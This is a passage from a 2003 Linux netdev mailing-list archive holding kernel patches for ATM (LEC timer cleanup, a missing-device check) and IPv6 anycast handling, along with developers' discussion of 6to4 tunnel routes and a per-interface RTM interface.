+#endif static void sigd_put_skb(struct sk_buff *skb) @@ -254,6 +256,8 @@ vcc_insert_socket(vcc->sk); set_bit(ATM_VF_META,&vcc->flags); set_bit(ATM_VF_READY,&vcc->flags); +#ifdef WAIT_FOR_DEMON wake_up(&sigd_sleep); +#endif return 0; } [atm]: return ENODEV if !dev # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher.
# This patch includes the following deltas: # ChangeSet 1.1413 -> 1.1414 # net/atm/common.c 1.43 -> 1.44 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/16 chas@relax.cmf.nrl.navy.mil 1.1414 # return ENODEV if !dev # -------------------------------------------- # diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Wed Jul 16 17:06:05 2003 +++ b/net/atm/common.c Wed Jul 16 17:06:05 2003 @@ -478,6 +478,8 @@ return -EINVAL; if (itf != ATM_ITF_ANY) { dev = atm_dev_lookup(itf); + if (!dev) + return -ENODEV; error = __vcc_connect(vcc, dev, vpi, vci); if (error) { atm_dev_put(dev); [atm]: if !IFF_UP drop the frames # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1380.1.43 -> 1.1380.1.44 # net/atm/lec.c 1.33 -> 1.34 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/08 chas@relax.cmf.nrl.navy.mil 1.1380.1.44 # if !IFF_UP drop the frames # -------------------------------------------- # diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Wed Jul 16 17:05:18 2003 +++ b/net/atm/lec.c Wed Jul 16 17:05:18 2003 @@ -692,10 +692,11 @@ atm_return(vcc,skb->truesize); if (*(uint16_t *)skb->data == htons(priv->lecid) || - !priv->lecd) { + !priv->lecd || + !(dev->flags & IFF_UP)) { /* Probably looping back, or if lecd is missing, lecd has gone down */ - DPRINTK("Ignoring loopback frame...\n"); + DPRINTK("Ignoring frame...\n"); dev_kfree_skb(skb); return; } [atm]: cleanup timers in lec # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. 
# This patch includes the following deltas: # ChangeSet 1.1380.1.44 -> 1.1380.1.45 # net/atm/lec.c 1.34 -> 1.35 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/08 chas@relax.cmf.nrl.navy.mil 1.1380.1.45 # timer cleanup # -------------------------------------------- # diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Wed Jul 16 17:05:30 2003 +++ b/net/atm/lec.c Wed Jul 16 17:05:30 2003 @@ -1031,7 +1031,7 @@ #define LEC_ARP_REFRESH_INTERVAL (3*HZ) static void lec_arp_check_expire(unsigned long data); -static __inline__ void lec_arp_expire_arp(unsigned long data); +static void lec_arp_expire_arp(unsigned long data); void dump_arp_table(struct lec_priv *priv); /* @@ -1371,7 +1371,7 @@ struct lec_arp_table *entry, *next; int i; - del_timer(&priv->lec_arp_timer); + del_timer_sync(&priv->lec_arp_timer); /* * Remove all entries @@ -1386,7 +1386,7 @@ entry = priv->lec_arp_empty_ones; while(entry) { next = entry->next; - del_timer(&entry->timer); + del_timer_sync(&entry->timer); lec_arp_clear_vccs(entry); kfree(entry); entry = next; @@ -1395,7 +1395,7 @@ entry = priv->lec_no_forward; while(entry) { next = entry->next; - del_timer(&entry->timer); + del_timer_sync(&entry->timer); lec_arp_clear_vccs(entry); kfree(entry); entry = next; @@ -1404,7 +1404,7 @@ entry = priv->mcast_fwds; while(entry) { next = entry->next; - del_timer(&entry->timer); + /* No timer, LANEv2 7.1.20 and 2.3.5.3 */ lec_arp_clear_vccs(entry); kfree(entry); entry = next; @@ -1478,8 +1478,6 @@ entry = (struct lec_arp_table *)data; - del_timer(&entry->timer); - DPRINTK("lec_arp_expire_arp\n"); if (entry->status == ESI_ARP_PENDING) { if (entry->no_tries <= entry->priv->max_retry_count) { @@ -1489,8 +1487,7 @@ send_to_lecd(entry->priv, l_arp_xmt, entry->mac_addr, NULL, NULL); entry->no_tries++; } - entry->timer.expires = jiffies + (1*HZ); - add_timer(&entry->timer); + mod_timer(&entry->timer, jiffies + (1*HZ)); } } @@ -1562,8 +1559,6 @@ unsigned 
long time_to_check; int i; - del_timer(&priv->lec_arp_timer); - DPRINTK("lec_arp_check_expire %p,%d\n",priv, atomic_read(&priv->lec_arp_users)); DPRINTK("expire: eo:%p nf:%p\n",priv->lec_arp_empty_ones, @@ -1621,8 +1616,8 @@ } lec_arp_put(priv); } - priv->lec_arp_timer.expires = jiffies + LEC_ARP_REFRESH_INTERVAL; - add_timer(&priv->lec_arp_timer); + + mod_timer(&priv->lec_arp_timer, jiffies + LEC_ARP_REFRESH_INTERVAL); } /* * Try to find vcc where mac_address is attached. From mika.liljeberg@welho.com Wed Jul 16 15:27:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 15:27:52 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GMRfFl003731 for ; Wed, 16 Jul 2003 15:27:43 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6GMT0LH022510; Thu, 17 Jul 2003 01:29:00 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6GMSxtS022509; Thu, 17 Jul 2003 01:28:59 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: kuznet@ms2.inr.ac.ru Cc: Pekka Savola , davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <200307151428.SAA08491@dub.inr.ac.ru> References: <200307151428.SAA08491@dub.inr.ac.ru> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058394538.5778.17.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 01:28:58 +0300 X-archive-position: 4114 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev Alexey, > And this silly combination is still _better_ than 6to4 address, which > contains redundant information, which can be mixed up with 
real _IPv6_ > 6to4 addresses and which contains IPv4 address in some place which > used to be identification of a network prefix. While I see where you're coming from, I don't really understand what the fuss is all about. IMHO, the real hack is being able to specify the tunnel endpoint using a gateway route in the first place. Whether that gateway address is IPv4-compatible or a 6to4 address is just a minor detail. I view my patch as a simple convenience to the user, extending a hack that already exists. A more "correct" way would be to specify the gateway address in the remote address field of the point-to-point SIT interface, and live with the fact that you need a separate SIT interface for each 6to4 gateway that you want to tunnel to. This already works, so the IPv4-compat route hack is actually redundant. My understanding was that it is there simply for convenience. MikaL From kuznet@ms2.inr.ac.ru Wed Jul 16 16:28:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 16:28:44 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GNSZFl005158 for ; Wed, 16 Jul 2003 16:28:36 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA12405; Thu, 17 Jul 2003 03:28:20 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307162328.DAA12405@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: mika.liljeberg@welho.com (Mika Liljeberg) Date: Thu, 17 Jul 2003 03:28:20 +0400 (MSD) Cc: pekkas@netcore.fi, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <1058394538.5778.17.camel@hades> from "Mika Liljeberg" at Jul 17, 2003 01:28:58 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4115 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence:
bulk X-list: netdev Hello! > While I see where you're coming from, I don't really understand what the > fuss is all about. The issue definitely does not worth of time already spent for the discussion. All the fuss is about the fact that this code lived and will live for years. If we allowed to add small tricks of this kind, it would end up as a full mess. Each convenience trick must have a logical background. I have been asked for an opinion, this is my opinion: 6to4 is wrong, addresses in format of 6over4 are natural, if they are deprecated, another and even more natural variant is use of link-local format, fe80::a.b.c.d. Alexey From mika.liljeberg@welho.com Wed Jul 16 16:37:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 16:38:12 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GNbtFl005602 for ; Wed, 16 Jul 2003 16:37:56 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6GNd3LH022679; Thu, 17 Jul 2003 02:39:03 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6GNd2bd022678; Thu, 17 Jul 2003 02:39:02 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: kuznet@ms2.inr.ac.ru Cc: pekkas@netcore.fi, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <200307162328.DAA12405@dub.inr.ac.ru> References: <200307162328.DAA12405@dub.inr.ac.ru> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058398742.5778.26.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 02:39:02 +0300 X-archive-position: 4116 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com 
Precedence: bulk X-list: netdev On Thu, 2003-07-17 at 02:28, kuznet@ms2.inr.ac.ru wrote: > > While I see where you're coming from, I don't really understand what the > > fuss is all about. > > The issue definitely does not worth of time already spent for the discussion. I agree. :) > All the fuss is about the fact that this code lived and will live for years. > If we allowed to add small tricks of this kind, it would end up as a full mess. > Each convenience trick must have a logical background. So what's the background for having the hack to specify a tunnel EP with a gateway route? > I have been asked for an opinion, this is my opinion: 6to4 is wrong, > addresses in format of 6over4 are natural, if they are deprecated, > another and even more natural variant is use of link-local format, > fe80::a.b.c.d. IPv4-mapped would be semantically correct. It definitely can't be confused with any real IPv6 address. MikaL From kuznet@ms2.inr.ac.ru Wed Jul 16 16:41:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 16:41:32 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GNfRFl005972 for ; Wed, 16 Jul 2003 16:41:28 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA12466; Thu, 17 Jul 2003 03:41:07 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307162341.DAA12466@dub.inr.ac.ru> Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 To: yoshfuji@linux-ipv6.org (YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=) Date: Thu, 17 Jul 2003 03:41:07 +0400 (MSD) Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org, linux-net@vger.kernel.org In-Reply-To: <20030716.173926.81875946.yoshfuji@linux-ipv6.org> from "YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=" at Jul 16, 2003 05:39:26 PM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position:
4117 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > My suggestion is: > - create L3 per-interface RTM, say, RTM_xxxIFACE. > - provide inet_device / inet6_dev things via this RTM. > e.g. per-interface statistics, flags etc. I agree for all 100%. I understand your attitude now. Alexey From kuznet@ms2.inr.ac.ru Wed Jul 16 16:58:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 16:58:38 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GNwTFl006974 for ; Wed, 16 Jul 2003 16:58:30 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA12485; Thu, 17 Jul 2003 03:58:15 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307162358.DAA12485@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: mika.liljeberg@welho.com (Mika Liljeberg) Date: Thu, 17 Jul 2003 03:58:15 +0400 (MSD) Cc: pekkas@netcore.fi, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <1058398742.5778.26.camel@hades> from "Mika Liljeberg" at Jul 17, 2003 02:39:02 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4118 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > So what's the background for having the hack to specify a tunnel EP with > a gateway route? Technically, it allows to avoid creating hundreds of devices to maintain lots of tunnels. Actually, it exists due to historical reasons. ipip and ipip6 tunnels used the trick from the very beginning. But f.e. ipgre device was new, so it uses more correct approach: actual mapping cross address families can be made via neighbour tables. 
But this requires to know an IPv6 address of the nexthop. Clean, but inconvenient. :-) Alexey From kuznet@ms2.inr.ac.ru Wed Jul 16 17:04:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 17:04:14 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H049Fl007393 for ; Wed, 16 Jul 2003 17:04:10 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA12843; Thu, 17 Jul 2003 04:03:56 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307170003.EAA12843@dub.inr.ac.ru> Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked To: pekkas@netcore.fi (Pekka Savola) Date: Thu, 17 Jul 2003 04:03:56 +0400 (MSD) Cc: davem@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at Jul 16, 2003 09:03:57 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4119 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > > > What happens when you do "ping6 3FFE:FFFF:A:B::1" ? > > > > Hey, you have lost track, rewind several mails ago. > > Nope. I'm just pointing out the general concept. > > > Of course, ping and > > any other protocols will work, how can it not work? :-) > > It has been made shown to work on other platforms, so why not Linux? ping did, does and will work and I do not understand what you want to say or ask. Do you want to know how it works? Well, IPv6 stack looks up the address in routing tables, finds the route, sees that it is on-link, sends NDISC, receiver replies, we create a frame and send the echo request. To continue? 
:-) Alexey From kuznet@ms2.inr.ac.ru Wed Jul 16 17:38:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 17:38:21 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H0cFFl008691 for ; Wed, 16 Jul 2003 17:38:16 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA12945; Thu, 17 Jul 2003 04:38:00 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307170038.EAA12945@dub.inr.ac.ru> Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 To: krkumar@us.ibm.com (Krishna Kumar) Date: Thu, 17 Jul 2003 04:38:00 +0400 (MSD) Cc: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org In-Reply-To: <3F15E86F.2030707@us.ibm.com> from "Krishna Kumar" at Jul 16, 2003 05:06:07 PM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4120 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > This is sort of what I had originally, so I should be able to change > it to do this quite easily. I didn't like the earlier suggestion of > using existing RTM_xxxLINK with RTM_xxxIFACE (since it was dev generic), > but having a new interface RTM_xxxIFACE sounds good to me. Actually, the original plan was to use ifli_family to query something or to direct a request to a specific interface on some netdevice. I wanted to reserve IFLI_PROTINFO attribute to encapsulate information private for specific family. It was not realized mostly because of absence of such information. Maybe, you will want to resurrect this.
Alexey From kuznet@ms2.inr.ac.ru Wed Jul 16 19:24:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 19:24:22 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H2O8Fl011730 for ; Wed, 16 Jul 2003 19:24:09 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id GAA13064; Thu, 17 Jul 2003 06:23:52 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307170223.GAA13064@dub.inr.ac.ru> Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast usage) To: kuznet@dub.inr.ac.ru (kuznet) Date: Thu, 17 Jul 2003 06:23:52 +0400 (MSD) Cc: davem@redhat.com, jmorris@redhat.com, mika.liljeberg@welho.com, pekkas@netcore.fi, netdev@oss.sgi.com In-Reply-To: from "kuznet" at Jul 17, 2003 05:12:47 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4121 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! Here it is. Please, review and complain. 1. Recognition of reserved anycasts is removed from ipv6_addr_type(). Flag IPV6_ADDR_ANYCAST is removed as well. 2. Some meaningless noop code checking for anycast which are not going to happen is removed from ndisc.c 3. ipv6_unicast_destination() replaces suboptimal ipv6_chk_acast_addr() in data paths. Alexey # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. 
# This patch includes the following deltas: # ChangeSet 1.1469 -> 1.1470 # net/ipv6/anycast.c 1.5 -> 1.6 # include/net/ip6_route.h 1.10 -> 1.11 # net/ipv6/icmp.c 1.36 -> 1.37 # net/ipv6/tcp_ipv6.c 1.64 -> 1.65 # net/ipv6/ndisc.c 1.52 -> 1.53 # net/ipv6/route.c 1.50 -> 1.51 # include/net/ipv6.h 1.22 -> 1.23 # net/ipv6/addrconf.c 1.58 -> 1.59 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/17 kuznet@oops.inr.ac.ru 1.1470 # Many files: # sanitize IPv6 anycast address support # -------------------------------------------- # diff -Nru a/include/net/ip6_route.h b/include/net/ip6_route.h --- a/include/net/ip6_route.h Thu Jul 17 06:13:09 2003 +++ b/include/net/ip6_route.h Thu Jul 17 06:13:09 2003 @@ -45,7 +45,8 @@ void *rtattr); extern int ip6_rt_addr_add(struct in6_addr *addr, - struct net_device *dev); + struct net_device *dev, + int anycast); extern int ip6_rt_addr_del(struct in6_addr *addr, struct net_device *dev); @@ -116,6 +117,13 @@ np->daddr_cache = daddr; np->dst_cookie = rt->rt6i_node ? 
rt->rt6i_node->fn_sernum : 0; write_unlock(&sk->sk_dst_lock); +} + +static inline int ipv6_unicast_destination(struct sk_buff *skb) +{ + struct rt6_info *rt = (struct rt6_info *) skb->dst; + + return rt->rt6i_flags & RTF_LOCAL; } #endif diff -Nru a/include/net/ipv6.h b/include/net/ipv6.h --- a/include/net/ipv6.h Thu Jul 17 06:13:09 2003 +++ b/include/net/ipv6.h Thu Jul 17 06:13:09 2003 @@ -51,7 +51,7 @@ /* * Addr type * - * type - unicast | multicast | anycast + * type - unicast | multicast * scope - local | site | global * v4 - compat * v4mapped @@ -63,7 +63,6 @@ #define IPV6_ADDR_UNICAST 0x0001U #define IPV6_ADDR_MULTICAST 0x0002U -#define IPV6_ADDR_ANYCAST 0x0004U #define IPV6_ADDR_LOOPBACK 0x0010U #define IPV6_ADDR_LINKLOCAL 0x0020U diff -Nru a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c --- a/net/ipv6/addrconf.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/addrconf.c Thu Jul 17 06:13:09 2003 @@ -209,15 +209,8 @@ }; return type; } - /* check for reserved anycast addresses */ - - if ((st & htonl(0xE0000000)) && - ((addr->s6_addr32[2] == htonl(0xFDFFFFFF) && - (addr->s6_addr32[3] | htonl(0x7F)) == (u32)~0) || - (addr->s6_addr32[2] == 0 && addr->s6_addr32[3] == 0))) - type = IPV6_ADDR_ANYCAST; - else - type = IPV6_ADDR_UNICAST; + + type = IPV6_ADDR_UNICAST; /* Consider all addresses with the first three bits different of 000 and 111 as finished.
@@ -2552,7 +2545,7 @@ switch (event) { case RTM_NEWADDR: - ip6_rt_addr_add(&ifp->addr, ifp->idev->dev); + ip6_rt_addr_add(&ifp->addr, ifp->idev->dev, 0); break; case RTM_DELADDR: addrconf_leave_solict(ifp->idev->dev, &ifp->addr); diff -Nru a/net/ipv6/anycast.c b/net/ipv6/anycast.c --- a/net/ipv6/anycast.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/anycast.c Thu Jul 17 06:13:09 2003 @@ -96,6 +96,13 @@ return onlink; } +static inline int ipv6_reserved_anycast(const struct in6_addr *addr) +{ + return (addr->s6_addr32[0] & htonl(0xE0000000)) && + ((addr->s6_addr32[2] == htonl(0xFDFFFFFF) && + (addr->s6_addr32[3] | htonl(0x7F)) == (u32)~0) || + (addr->s6_addr32[2] == 0 && addr->s6_addr32[3] == 0)); +} /* * socket join an anycast group @@ -112,6 +119,8 @@ if (ipv6_addr_type(addr) & IPV6_ADDR_MULTICAST) return -EINVAL; + if (ipv6_chk_addr(addr, NULL)) + return -EINVAL; pac = sock_kmalloc(sk, sizeof(struct ipv6_ac_socklist), GFP_KERNEL); if (pac == NULL) @@ -172,8 +181,7 @@ err = -EPERM; if (err) goto out_dev_put; - } else if (!(ipv6_addr_type(addr) & IPV6_ADDR_ANYCAST) && - !capable(CAP_NET_ADMIN)) { + } else if (!ipv6_reserved_anycast(addr) && !capable(CAP_NET_ADMIN)) { err = -EPERM; goto out_dev_put; } @@ -347,7 +355,7 @@ idev->ac_list = aca; write_unlock_bh(&idev->lock); - ip6_rt_addr_add(&aca->aca_addr, dev); + ip6_rt_addr_add(&aca->aca_addr, dev, 1); addrconf_join_solict(dev, &aca->aca_addr); diff -Nru a/net/ipv6/icmp.c b/net/ipv6/icmp.c --- a/net/ipv6/icmp.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/icmp.c Thu Jul 17 06:13:09 2003 @@ -415,8 +415,7 @@ saddr = &skb->nh.ipv6h->daddr; - if (ipv6_addr_type(saddr) & IPV6_ADDR_MULTICAST || - ipv6_chk_acast_addr(0, saddr)) + if (!ipv6_unicast_destination(skb)) saddr = NULL; memcpy(&tmp_hdr, icmph, sizeof(tmp_hdr)); diff -Nru a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c --- a/net/ipv6/ndisc.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/ndisc.c Thu Jul 17 06:13:09 2003 @@ -785,8 +785,7 @@ ipv6_addr_all_nodes(&maddr); ndisc_send_na(dev, NULL,
&maddr, &ifp->addr, ifp->idev->cnf.forwarding, 0, - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 0 : 1, - 1); + 1, 1); in6_ifa_put(ifp); return; } @@ -809,8 +808,7 @@ if (neigh || !dev->hard_header) { ndisc_send_na(dev, neigh, saddr, &ifp->addr, ifp->idev->cnf.forwarding, 1, - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 0 : 1, - 1); + 1, 1); if (neigh) neigh_release(neigh); } diff -Nru a/net/ipv6/route.c b/net/ipv6/route.c --- a/net/ipv6/route.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/route.c Thu Jul 17 06:13:09 2003 @@ -1256,7 +1256,7 @@ * Add address */ -int ip6_rt_addr_add(struct in6_addr *addr, struct net_device *dev) +int ip6_rt_addr_add(struct in6_addr *addr, struct net_device *dev, int anycast) { struct rt6_info *rt = ip6_dst_alloc(); @@ -1275,6 +1275,8 @@ rt->u.dst.obsolete = -1; rt->rt6i_flags = RTF_UP | RTF_NONEXTHOP; + if (!anycast) + rt->rt6i_flags |= RTF_LOCAL; rt->rt6i_nexthop = ndisc_get_neigh(rt->rt6i_dev, &rt->rt6i_gateway); if (rt->rt6i_nexthop == NULL) { dst_free((struct dst_entry *) rt); diff -Nru a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c --- a/net/ipv6/tcp_ipv6.c Thu Jul 17 06:13:09 2003 +++ b/net/ipv6/tcp_ipv6.c Thu Jul 17 06:13:09 2003 @@ -971,7 +971,7 @@ if (th->rst) return; - if (ipv6_addr_is_multicast(&skb->nh.ipv6h->daddr)) + if (!ipv6_unicast_destination(skb)) return; /* @@ -1175,8 +1175,7 @@ if (skb->protocol == htons(ETH_P_IP)) return tcp_v4_conn_request(sk, skb); - /* FIXME: do the same check for anycast */ - if (ipv6_addr_is_multicast(&skb->nh.ipv6h->daddr)) + if (!ipv6_unicast_destination(skb)) goto drop; /* From krkumar@us.ibm.com Wed Jul 16 19:29:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 19:29:17 -0700 (PDT) Received: from over.ny.us.ibm.com (over.ny.us.ibm.com [32.97.182.111]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H2TBFl012128 for ; Wed, 16 Jul 2003 19:29:12 -0700 Received: from e4.ny.us.ibm.com (e4.esmtp.ibm.com [9.14.6.104]) by pokfb.esmtp.ibm.com (8.12.9/8.12.2) with ESMTP id 
h6H0GPNu113898 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=OK) for ; Wed, 16 Jul 2003 20:16:27 -0400 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6H06PwO176178; Wed, 16 Jul 2003 20:06:25 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6H06NGH018856; Wed, 16 Jul 2003 20:06:24 -0400 Message-ID: <3F15E86F.2030707@us.ibm.com> Date: Wed, 16 Jul 2003 17:06:07 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: kuznet@ms2.inr.ac.ru CC: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 References: <200307162341.DAA12466@dub.inr.ac.ru> In-Reply-To: <200307162341.DAA12466@dub.inr.ac.ru> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4122 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev This is sort of what I had originally, so I should be able to change it to do this quite easily. I didn't like the earlier suggestion of using existing RTM_xxxLINK with RTM_xxxIFACE (since it was dev generic), but having a new interface RTM_xxxIFACE sounds good to me. Thanks, - KK kuznet@ms2.inr.ac.ru wrote: > Hello! > > >>My suggestion is: >> - create L3 per-interface RTM, say, RTM_xxxIFACE. >> - provide inet_device / inet6_dev things via this RTM. >> e.g. per-interface statistics, flags etc. > > > I agree for all 100%. I understand your attitude now. 
